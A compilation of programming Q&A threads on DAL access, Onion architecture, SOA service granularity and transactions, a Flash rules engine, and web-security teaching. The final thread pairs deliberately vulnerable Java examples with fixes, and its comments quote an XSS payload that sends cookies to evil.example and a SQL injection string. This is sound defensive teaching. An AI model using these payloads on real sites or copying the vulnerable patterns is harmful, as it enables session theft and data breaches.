Situation: The DBA is an offsite contractor who keeps the entire DAL code checked out in TFS. As the front-end developer it would be nice to be able to add columns and tweak procs and whatnot, without having to wait for this guy to respond to your emails before the work gets done.
Question: What would be a recommended solution/process that would allow for more rapid/agile development, while maintaining data integrity as well as peace, love, and happiness among the team?
I'm getting some good feedback on Programmers here.
There is no general technical answer to your question (unless you can define a very limited kind of needed access, which can be supplied via an API he provides for you in the DAL, etc.).
Assuming you have already tried to talk with him and perhaps even escalated the issue, there is probably a valid reason for limiting access (security, data model integrity, performance tuning, version control, etc.).
Try to understand the reasoning behind his approach, and to better define your actual needs; it is possible that after that you can formulate an improvement to your architecture (such as the aforementioned API) or to your development process. Most importantly, talk frankly about your concerns; communication can go a long way, as long as you are willing to understand the other side.
One of the key benefits provided by Onion architecture is the ability to swap out "infrastructure" elements, such as "Data Access, I/O, and Web Services" (http://jeffreypalermo.com/blog/the-onion-architecture-part-3/).
Jeff says in his post from 2008 that "the industry has modified data access techniques at least every three years".
Does anyone have an example of a reasonably large project where Onion architecture was used and swapping out of key infrastructure elements was subsequently undertaken?
I'm interested to understand:
How common is this scenario, in general?
My instinct tells me that while "data access techniques" may be modified every three years, changes to the actual infrastructure that solutions run on, which would allow this benefit to be realised, may be a lot less frequent?
What were the conditions that the solution was operating under originally?
What caused the change in the underlying infrastructure?
Are there lessons to be learned about the practical implications of changing infrastructure in this way, which may allow us to refine original implementations of the Onion architecture?
I'm interested to hear whether there were unexpected changes required beyond just replacing the infrastructure component and implementing the same interface. For example, did the new infrastructure require new arguments to be passed to previously defined methods e.g. SaveOrder(int ID) -> SaveOrder(int ID, bool AllowSiblings, bool SiblingCreated) when moving from a Relational to NoSQL DB model.
Did the implementation of this architecture + rework to migrate to new infrastructure significantly decrease the total effort required, if compared to a traditional, coupled approach?
Do developers find coupled, hard-referenced code easier to write and debug than loosely coupled, indirectly referenced code, but the eventual payoff for infrastructure changes makes this worth it?
Well, IMHO, the primary intent of such an architecture style (Hexagonal, Ports & Adapters, Onion…) is that it allows you to focus on your domain and how you will deliver value, instead of focusing first on the UI, frameworks, or storage issues. It allows you to defer such decisions.
As Jeffrey says, the ability to swap out "infrastructure" elements is a nice side effect of such an architecture style. Even if you will not switch from one RDBMS to another every 6 months, it's quite reassuring to know that it would be possible to do so without pain.
Rather than thinking about changing your storage mechanism on a regular basis, or as you said "swapping out of key infrastructure elements", think about the third-party services that you plug into your system. Those tend to change on a regular basis, and you will also switch from one provider to another. That is a far more common scenario, and one we face much more regularly. In this particular case the domain behaviour won't change, the interfaces will stay the same, and you won't have to change a single line of code in your core domain layer. Only the implementation somewhere in your infrastructure layer might have to change. That's another noteworthy benefit of this kind of architecture!
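To make that concrete, here is a minimal Java sketch of the idea; PaymentGateway, PaymentReceipt and the provider names are all invented for illustration. The core domain owns a port interface, each provider gets its own adapter in the infrastructure layer, and switching providers never touches the domain code:

    // Hypothetical port defined in the core domain layer; the domain only knows
    // about this interface, never about a concrete provider SDK.
    public interface PaymentGateway {
        PaymentReceipt charge(String customerId, long amountInCents);
    }

    // Simple value object returned by the port (Java 16+ record syntax).
    record PaymentReceipt(String customerId, long amountInCents, String provider) {}

    // Adapter living in the infrastructure layer for one (made-up) provider.
    class AcmePaymentsAdapter implements PaymentGateway {
        @Override
        public PaymentReceipt charge(String customerId, long amountInCents) {
            // Here you would call the Acme SDK / HTTP API and map its response.
            return new PaymentReceipt(customerId, amountInCents, "ACME");
        }
    }

    // Switching providers means writing a new adapter; the domain code that
    // depends on PaymentGateway does not change at all.
    class OtherProviderAdapter implements PaymentGateway {
        @Override
        public PaymentReceipt charge(String customerId, long amountInCents) {
            return new PaymentReceipt(customerId, amountInCents, "OTHER");
        }
    }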
Please read this nice Uncle Bob article about Clean Architecture, where he explains why the ability to defer critical infrastructure decisions is really cool!
--- EDIT ---
Could you provide an example of where you have swapped out a third party service?
We have tons of examples where we switched from one provider to another (from payment providers to live feed providers, or whatever). The business stays the same; the domain behaviours are still the same. Changing a provider should not have any kind of impact on your business. You don't have to change the way your business works, where the value really is, just because you change from one provider to another; it makes no sense. Isolating your domain behaviours in an independent core layer, with no dependencies on any third-party libraries, frameworks, or provider services, definitely helps you deal with changes.
I have the feeling that you're trying to convince yourself whether to go with Onion. You might be on the wrong track if you're only thinking about migrating to new infrastructure-related stuff (db, third-party stuff...). Focus on your domain instead. Ask yourself whether your domain is complex enough to require such an architecture style. Don't use a bazooka to kill a fly. As Simon Brown says: "Principles are good, but make sure they're realistic and don't have a negative impact"!
If your application is quite small, with no complex business domain, go for a classic n-tier architecture; that's OK. Don't change things just for the sake of it or because of a buzzword. But also keep in mind that an isolated core business layer without dependencies, as in Onion architecture, can be very easy to unit test!
Now for your additional questions:
Did the implementation of this architecture + rework to migrate to new infrastructure significantly decrease the total effort required, if compared to a traditional, coupled approach?
It depends! :-) In tightly coupled applications, as soon as there's a new infrastructure element to be migrated, there is little doubt that you'll have to modify code in every layer (including the business layer). But if the application is small, quite straightforward, and well organised with decent test coverage, this shouldn't be a big deal. Now, if it's quite big, with a more complex business domain, it might be a good idea to isolate that domain in a totally separate layer with no dependencies at all, ensuring that infrastructure changes won't cause any business regressions.
Do developers find coupled, hard-referenced code easier to write and debug than loosely coupled, indirectly referenced code, but the eventual payoff for infrastructure changes makes this worth it?
Well, ask your teammates! Are they used to working with IoC? Remember that architecture design and choices must be a team decision, something shared by the whole team.
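If IoC is new to some of them, the underlying idea fits in a few lines. Here is a hedged sketch, reusing the hypothetical PaymentGateway port from the sketch above, with no particular container assumed:

    // The domain service depends on the abstraction, not on a concrete adapter.
    class CheckoutService {
        private final PaymentGateway gateway;

        // Constructor injection: the caller (or an IoC container such as Spring)
        // decides which PaymentGateway implementation to supply.
        CheckoutService(PaymentGateway gateway) {
            this.gateway = gateway;
        }

        PaymentReceipt checkout(String customerId, long totalInCents) {
            return gateway.charge(customerId, totalInCents);
        }
    }

    // Wiring it up by hand, without any container:
    // CheckoutService checkout = new CheckoutService(new AcmePaymentsAdapter());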
Our client follows SOA principles and has designed web services that are very fine grained, like createCustomer, deleteCustomer, etc.
I am not sure that fine-grained services are desirable, as they create transaction-related issues. For example, suppose a business requirement is that every Customer must have an Address when it's created. In this case, the presentation component will invoke createCustomer first and then createAddress. The services internally use plain JDBC to update the respective tables in the db. Since a service is invoked by an external component, it has no way of fulfilling the transactional requirement here, i.e. if createAddress fails, the createCustomer operation must be rolled back.
I guess one approach to deal with this is to either design coarse-grained services (that create a Customer and the associated Address in one single JDBC transaction), or
perhaps simply create a reversing service (deleteCustomer) that reverses the action of createCustomer.
Any suggestions? Thanks.
The short answer: services should be designed for the convenience of the service client. If the client is told "call this, then don't forget to call that", you're making their lives too difficult. There should be a coarse-grained service.
The long answer: can a Customer reasonably be entered with no Address? If so, we call
createCustomer(stuff but no address)
and the result is a valid (if maybe not ideal) state for a customer. Later we call
changeCustomerAddress(customerId, address)
and now the persisted customer is more useful.
In this scenario the API is just fine. The key point is that the system's integrity does not depend upon the client code "remembering" to do something, in this case to add the address. However, it is more likely that we don't want a customer in the system without an address, in which case I see it as the service's responsibility to ensure that this happens, and to give the caller the fewest possibilities of getting it wrong.
I would see a coarse-grained createCompleteCustomer() method as by far the best way to go - this allows the service provider to solve the problem once, rather than requiring every client programmer to implement the logic.
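As a rough illustration of what that could look like with the plain JDBC the question mentions (the table names, column names and DataSource wiring are assumptions, not the client's actual schema), the coarse-grained operation can wrap both inserts in one transaction so the address can never be forgotten:

    import java.sql.Connection;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;
    import java.sql.SQLException;
    import java.sql.Statement;
    import javax.sql.DataSource;

    public class CustomerService {
        private final DataSource dataSource;

        public CustomerService(DataSource dataSource) {
            this.dataSource = dataSource;
        }

        // Coarse-grained operation: the customer and its address are created
        // atomically, so a customer without an address can never be persisted.
        public void createCompleteCustomer(String name, String street, String city) throws SQLException {
            try (Connection con = dataSource.getConnection()) {
                con.setAutoCommit(false);
                try {
                    long customerId;
                    try (PreparedStatement insertCustomer = con.prepareStatement(
                            "INSERT INTO customer (name) VALUES (?)", Statement.RETURN_GENERATED_KEYS)) {
                        insertCustomer.setString(1, name);
                        insertCustomer.executeUpdate();
                        try (ResultSet keys = insertCustomer.getGeneratedKeys()) {
                            keys.next();
                            customerId = keys.getLong(1);
                        }
                    }
                    try (PreparedStatement insertAddress = con.prepareStatement(
                            "INSERT INTO address (customer_id, street, city) VALUES (?, ?, ?)")) {
                        insertAddress.setLong(1, customerId);
                        insertAddress.setString(2, street);
                        insertAddress.setString(3, city);
                        insertAddress.executeUpdate();
                    }
                    con.commit();   // both rows become visible together
                } catch (SQLException e) {
                    con.rollback(); // if the address insert fails, the customer insert is undone
                    throw e;
                }
            }
        }
    }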
Alternatives:
a) There are Web Services specs for Atomic Transactions, and major vendors do support these specs. In principle you could implement this using fine-grained methods and true transactions. In practice, I think you enter a world of complexity if you go down this route.
b) A stateful interface (work, work, commit), as mentioned by @mtreit. Generally speaking, statefulness either adds complexity or obstructs scalability. Where does the service hold the intermediate state? If in memory, then we require affinity to a particular service instance and hence introduce scaling and reliability problems. If in some state or work-in-progress database, then we have significant additional implementation complexity.
OK, let's start:
Our client follows SOA principles and has designed web services that are very fine grained, like createCustomer, deleteCustomer, etc.
No, the client has forgotten to follow the SOA principles and has put up what most people do - a morass of badly defined interfaces. Following SOA principles, the client would have gone for a coarser interface (such as, for example, the OData mechanism to update data) or followed the advice of any book on multi-tiered architecture written in the last 25 years. SOA is just another word for what was invented with CORBA, and all the mistakes SOA dudes make today were basically well-known design stupidities 10 years ago with CORBA. Not that any of the people doing SOA today have ever heard of CORBA.
I am not sure that fine-grained services are desirable, as they create transaction-related issues.
Only for users and platforms not supporting web services. Seriously. Naturally you get transactional issues if you - ignore transactional issues in your programming. The trick here is that the people further up the food chain did not; your client just decided to ignore common knowledge (again, see my first remark on CORBA).
The people designing web services were well aware of transactional issues, which is why the web service specifications (WS-*) actually contain mechanisms for handling transactional integrity by moving commit operations up to the client calling the web service. The particular spec your client and you should read is WS-AtomicTransaction.
If you use current technology to expose your web service (i.e. WCF on the MS platform; similar technologies exist in the Java world), then you can expose transaction flow information to the client and let the client handle transaction demarcation. This has its own share of problems - like clients keeping transactions open maliciously - but it is still pretty much the only way to handle transactions that do get defined in the client.
As you give no platform and just mention Java, I am pointing you to an MS example of how that can look:
http://msdn.microsoft.com/en-us/library/ms752261.aspx
Web services, in general, are a lot more powerful and a lot more thought out than most people doing SOA ever realise. Most of the problems they see were solved a long time ago. But then, SOA is just a buzzword for multi-tiered architecture, and most people who think it is the greatest thing since sliced bread just don't know what was around 10 years ago.
As your customer, I would be a lot more careful about the performance side. Fine-grained, non-semantic web services like the ones he defines are a performance hog for anything but casual use, because the number of times you cross the network to ask for / update small stuff means the network latency kills you. Creating an order for, say, 10 goods can easily take 30-40 network calls in this scenario, which can really take a lot of time. SOA has preached, ever since the beginning (if you ignore the ramblings of those who don't know the history), NOT to use fine-grained calls but to go for a coarse-grained exchange of documents and/or a semantic approach, much like the OData system.
If transactionality is required, a coarser-grained single operation that can implement transaction-semantics on the server is definitely going to be much simpler to implement.
That said, certainly it is possible to construct some scheme where the target of the operations is not committed until all of the necessary fine-grained operations have succeeded. For instance, have a Commit operation that checks some flag associated with the object on the server; the flag is not set until all of the necessary steps in the transaction have completed, and Commit fails if the flag is not set.
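A hypothetical sketch of what such a commit-flag scheme might look like; the names and the in-memory draft store are assumptions, and this is not a recommendation over the coarse-grained approach:

    import java.util.EnumSet;
    import java.util.Map;
    import java.util.Set;
    import java.util.concurrent.ConcurrentHashMap;

    public class CustomerDraftService {
        enum Step { CUSTOMER_CREATED, ADDRESS_ADDED }

        // Server-side work-in-progress state, keyed by a draft id.
        // In-memory only for the sketch; a real service would need a shared store.
        private final Map<String, Set<Step>> drafts = new ConcurrentHashMap<>();

        public void createCustomer(String draftId, String name) {
            // ... stage the customer data somewhere not yet visible to other clients
            markStep(draftId, Step.CUSTOMER_CREATED);
        }

        public void createAddress(String draftId, String street, String city) {
            // ... stage the address data
            markStep(draftId, Step.ADDRESS_ADDED);
        }

        // Commit refuses to run unless every required step has been completed.
        public void commit(String draftId) {
            Set<Step> done = drafts.getOrDefault(draftId, EnumSet.noneOf(Step.class));
            if (!done.containsAll(EnumSet.allOf(Step.class))) {
                throw new IllegalStateException("Draft " + draftId + " is incomplete: " + done);
            }
            // ... promote the staged data in a single local transaction
            drafts.remove(draftId);
        }

        private void markStep(String draftId, Step step) {
            // compute() mutates the per-draft set atomically for that key.
            drafts.compute(draftId, (id, steps) -> {
                Set<Step> s = (steps == null) ? EnumSet.noneOf(Step.class) : steps;
                s.add(step);
                return s;
            });
        }
    }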
Of course, if having light-weight, fine grained operations is an important design requirement, perhaps the need to have transactionality should be re-thought.
I frequently hear Service-Oriented Architecture (SOA) being tossed around as a buzzword among non-technical customers or program managers with little concern for or understanding of what it actually entails (example: "Can I buy a SOA?"). There's also a lot of misinformation about SOA (example: "Only web apps can use SOA") and a general lack of understanding of its capabilities (example: "SOA can make all of your data work together").
What are some key facts that you, as someone who understands the technical side of SOA, use to educate program managers on the appropriate use and understanding of SOA? What's the best way to set the record straight with non-technical folks?
For non-technical people I would use the following concept: the whole professional world is service-oriented.
Instead of baking a cookie yourself, you go to the baker.
Instead of trying to cure yourself, you go to the doctor.
Instead of writing a program, you ask a programmer to do it for you.
This implies two major advantages:
Each one does his job better than if we were all trying to solve all our tasks separately.
There is a way that allows non-professionals to communicate with those who will solve the task (in the real world, that way is money and business contracts).
In the world of software, such an architecture is implemented by defining specialised services (applications) dedicated to performing specific tasks, and by defining protocols that solve the problem of communication between those applications.
When such an architecture is deployed, you get some benefits which can also be mapped to the real world:
If the doctor is unavailable, you cannot be cured, but at least you can get a cookie from the bakery! In software, this means one failed service does not break the whole system.
Usually doctors and bakers do not share the same room, and this allows them to operate better. Just as in software, you can place each service on its own hardware.
For the software world this means better availability, maintainability, reuse, and reduced costs.
Good luck!
"SOA is like hiring new employees when the job gets too large for the current team." Each part of the whole system is analogous an employee. Managers understand employees ;)
Maybe you have some applications in your company to use as a demonstration.
Try to show them the big picture: lots of loosely dependent services with some common needs/features created by various teams, then pull out those embedded but commonly used features and expose them as service providers.
The other thing that comes to mind is to show them the various connectors that the services can use to communicate (maybe there are some really old screen-scraping legacy apps). The message bus concept, with normalisation and transaction handling, also needs to be clarified. In my opinion, non-technical people should see the whole SOA concept as loosely coupled services talking to each other with any kind of messages, where services are written/managed/governed by different teams (so formal service declarations and SLAs can come in handy).
Try to avoid mentioning vendors, if possible. Or mention lots of vendors and technologies for each part in order to show them the various options.
I'm working on an app which will, like most apps, have a whole boatload of business logic, almost all of which will need to be executed both on the server and on the Flash-based client… and I'm trying to figure out the best (read: least complex) way to implement the rules engine.
These are the parameters of the problem:
The rules engine must both run in a web browser (i.e., in Flash Player) and on the server. Duplicating the logic (e.g., by writing a "server" version and a "client" version) would be an unacceptable risk.
The input/output data is fairly complex, so serialization is a nontrivial problem. We are currently using AMF for all of our serialization needs, and using another protocol would add significant complexity… So it should probably be avoided.
It is infeasible to implement a "rules description language". Experimentation has shown that the rules are sufficiently complex that any such language would need to be Turing complete… which would also add a significant amount of complexity.
The rules engine will need to make some, but not very many, service calls.
Currently, the best contenders are:
Writing the code in ActionScript, then running it on the server. In theory it's possible to start up an AVM instance, get it long-polling a gateway, then pass data back and forth that way… But that seems less than ideal. Is there a "good" way of doing this?
Writing the code in Haxe. I don't know anything about Haxe's AMF support, so that could be a deal-breaker.
Something involving Tamarin. Seems like a viable option, but I haven't done enough research to tell either way.
So, what do you think? Are any of these options clearly better than the others? Is there something I haven't thought of that's worth considering?
Finally, thanks for reading this wall of text :)
How much data are you talking about? You could use Adobe AIR if you want to run it on the server and have it access a queue or something.
This is a shameless information gathering exercise for my own book.
One of the talks I give in the community is an introduction to web site vulnerabilities. Usually during the talk I can see at least two members of the audience go very pale; and this is basic stuff: Cross-Site Scripting, SQL Injection, Information Leakage, Cross-Site Request Forgery, and so on.
So, thinking back to when you were one, as a beginning web developer (be it ASP.NET or not), what do you feel would be useful information about web security and how to develop securely? I will already be covering the OWASP Top Ten.
(And yes, this means Stack Overflow will be in the acknowledgements list if someone comes up with something I haven't thought of yet!)
It's all done now, and published. Thank you all for your responses.
First, I would point out the insecurities of the web in a way that makes them accessible to people for whom developing with security in mind may (unfortunately) be a new concept. For example, show them how to intercept an HTTP header and implement an XSS attack. The reason you want to show them the attacks is so that they have a better idea of what they're defending against. Talking about security beyond that is great, but without understanding the type of attack they're meant to thwart, it will be hard for them to accurately "test" their systems for security. Once they can test for security by trying to intercept messages, spoof headers, and so on, they at least know whether whatever security they're trying to implement is working. You can then teach them whatever methods you want for implementing that security with confidence, knowing that if they get it wrong, they will actually know about it, because it will fail the security tests you showed them.
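For example, a reflected XSS demo can be as small as one servlet that echoes a query parameter; showing the vulnerable line next to the fixed one makes both the attack and the defence concrete. This is a sketch against the classic javax.servlet API, and the hand-rolled htmlEscape helper is only for the demo - in practice a vetted encoder library is the better choice:

    import java.io.IOException;
    import javax.servlet.http.HttpServlet;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class SearchServlet extends HttpServlet {
        @Override
        protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
            String query = req.getParameter("q");
            resp.setContentType("text/html");

            // VULNERABLE: user input written straight into the page, so
            // ?q=<script>document.location='http://evil.example/?c='+document.cookie</script>
            // executes in the victim's browser.
            // resp.getWriter().println("You searched for: " + query);

            // SAFER: HTML-encode anything that came from the request before echoing it.
            resp.getWriter().println("You searched for: " + htmlEscape(query));
        }

        // Minimal escaping for the demo; a vetted library (e.g. the OWASP Java
        // Encoder) is preferable to rolling your own.
        private static String htmlEscape(String s) {
            if (s == null) return "";
            return s.replace("&", "&amp;").replace("<", "&lt;")
                    .replace(">", "&gt;").replace("\"", "&quot;").replace("'", "&#39;");
        }
    }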
Defensive programming, as an archetypal topic that covers all the particular attacks, since most, if not all, of them are caused by not thinking defensively enough.
Make that subject the central column of the book. What would've served me well back then was knowing about techniques for never trusting anything, not just one-off tips like "do not allow SQL comments or special chars in your input".
Another interesting thing I'd love to have learned earlier is how to actually test for them.
I think all vulnerabilities come from programmers not thinking - either momentary lapses of judgement, or something they simply hadn't thought of. One big vulnerability in an application that I was tasked to "fix up" was that the authentication method returned 0 (zero) when the user logging in was an administrator. Because the variable was originally initialised to 0, if anything went wrong - such as the database being down, which caused an exception to be thrown - the variable would never be set to the proper "security code", and the user would end up with admin access to the site. Absolutely horrible thought went into that process. So, that brings me to a major security concept: never set the initial value of a variable representing a "security level", or anything of that sort, to something that represents total god control of the site. Better yet, use existing libraries that have gone through the fire of massive production use over a long period of time.
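That bug is easy to show in a few lines. Here is a hypothetical before/after sketch of the "default means admin" mistake and its fail-secure counterpart:

    public class AuthService {
        private static final int ADMIN = 0;
        private static final int DENIED = -1; // hypothetical "no access" code

        // BROKEN: securityCode starts out as 0, which happens to mean ADMIN.
        // If the lookup throws (e.g. the database is down), the catch swallows it
        // and the caller gets full admin rights by default.
        public int brokenAuthenticate(String user, String password) {
            int securityCode = 0;
            try {
                securityCode = lookUpSecurityCode(user, password);
            } catch (Exception e) {
                // swallowed: securityCode is still 0, i.e. admin
            }
            return securityCode;
        }

        // FAIL-SECURE: the default is "no access", and any failure keeps it that way.
        public int authenticate(String user, String password) {
            int securityCode = DENIED;
            try {
                securityCode = lookUpSecurityCode(user, password);
            } catch (Exception e) {
                // log and fall through: the caller still gets DENIED
            }
            return securityCode;
        }

        // Stub for the sketch; imagine this querying the user store and
        // possibly throwing if the database is unavailable.
        private int lookUpSecurityCode(String user, String password) {
            throw new UnsupportedOperationException("not part of the sketch");
        }
    }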
I would like to see how ASP.NET security is different from ASP Classic security.
Good to hear that you will have the OWASP Top Ten. Why not also include coverage of the CWE/SANS Top 25 Most Dangerous Programming Errors?
How to make sure your security approach scales with SQL Server. In particular, how to avoid having SQL Server serialize requests from multiple users because they all connect with the same ID...
I always try to show the worst-case scenario for things that might go wrong. For instance, how a cross-site script injection can work as a black-box attack, even on pages in the application that the hacker can't access himself, or how an SQL injection can also work as a black box and let a hacker steal your sensitive business data, even when your website connects to the database with a normal, non-privileged login account.
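For the SQL injection demo, a side-by-side snippet of the concatenated query versus the parameterized one usually lands well. The users table and its columns are made up for the example, and real code would of course hash passwords rather than compare them in SQL:

    import java.sql.Connection;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;
    import java.sql.SQLException;
    import java.sql.Statement;

    public class LoginDao {
        // VULNERABLE: with userName = "' OR '1'='1' --" the WHERE clause always
        // matches, and UNION-based payloads can pull data from other tables.
        public boolean brokenLogin(Connection con, String userName, String password) throws SQLException {
            String sql = "SELECT 1 FROM users WHERE name = '" + userName
                    + "' AND password = '" + password + "'";
            try (Statement st = con.createStatement(); ResultSet rs = st.executeQuery(sql)) {
                return rs.next();
            }
        }

        // SAFER: parameters are sent separately from the SQL text, so user input
        // can never change the structure of the query.
        public boolean login(Connection con, String userName, String password) throws SQLException {
            String sql = "SELECT 1 FROM users WHERE name = ? AND password = ?";
            try (PreparedStatement ps = con.prepareStatement(sql)) {
                ps.setString(1, userName);
                ps.setString(2, password);
                try (ResultSet rs = ps.executeQuery()) {
                    return rs.next();
                }
            }
        }
    }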